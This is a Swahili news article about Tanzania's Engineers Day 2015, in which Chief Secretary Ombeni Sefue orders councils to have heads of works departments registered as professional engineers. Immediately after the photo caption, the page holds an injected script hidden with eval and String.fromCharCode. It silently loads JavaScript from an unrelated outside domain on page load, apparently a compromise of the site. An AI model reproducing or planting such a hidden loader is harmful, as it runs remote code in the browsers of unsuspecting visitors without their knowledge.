<p>Katibu Mkuu Kiongozi, Balozi Ombeni Sefue akikabidhi vyeti na miongozo mbalimbali ya utendaji kazi kwa wahandisi baada ya kuapishwa Dar es Salaam, wakati wa ufunguzi wa Siku ya Wahandisi nchini jijini jana. </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
KATIBU Mkuu Kiongozi, Balozi Ombeni Sefue ameziagiza Halmashauri zote nchini kuhakikisha kwamba wakuu wote wa Idara za Ujenzi wamesajiliwa kama wahandisi wataalamu ifikapo Juni 30, mwakani.
Balozi Sefue aliyasema hayo jana Dar es Salaam wakati akifungua maadhimisho ya âSiku ya Wahandisi Tanzania 2015â iliyolenga kuiwezesha jumuiya ya kihandisi kuuonesha umma nini wahandisi wa Tanzania wanaweza kufanya katika kuleta maendeleo ya nchi.
Alisisitiza kwa taasisi zote za serikali nchini kuhakikisha zinatumia huduma za ushauri wa kihandisi kutoka taasisi zilizosajiliwa na Bodi ya Usajili wa Wahandisi kwa ajili ya ujenzi wa miradi ikiwemo miundombinu ya barabara, maji na umeme.
âNasisitiza waajiri wote pia kuhakikisha wanatekeleza sheria ya uhandisi namba 15 ya mwaka 1997 inayoelekeza wahandisi wote kuwa na leseni za uhandisi,â alisema Balozi Sefue.
Aidha, Sefue aliwataka wahandisi kujenga ushirikiano zaidi katika nchi za Afrika hasa katika teknolojia na sekta nyingine katika kurahisisha maendeleo kwa kuwa changamoto zao zinafana katika maeneo yote.
âNawasihi sana muongeze ushirikiano ili muweze kuyakabili matatizo hayo kwa wakati. Nawapongeza wahandisi wote kwa kazi nzuri mnazofanya kwa kuwa hakuna mtu ambaye kazi zake hazijaguswa na kazi za wahandisi,â alisema Katibu Mkuu Kiongozi.
Pia aliwataka wahandisi kufanya kazi zao kwa weledi na kwa viwango vinavyokubalika ili kuepusha madhara yakiwemo maafa na ulemavu yanayoweza kutokea kutokana na kazi kufanywa chini ya viwango.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments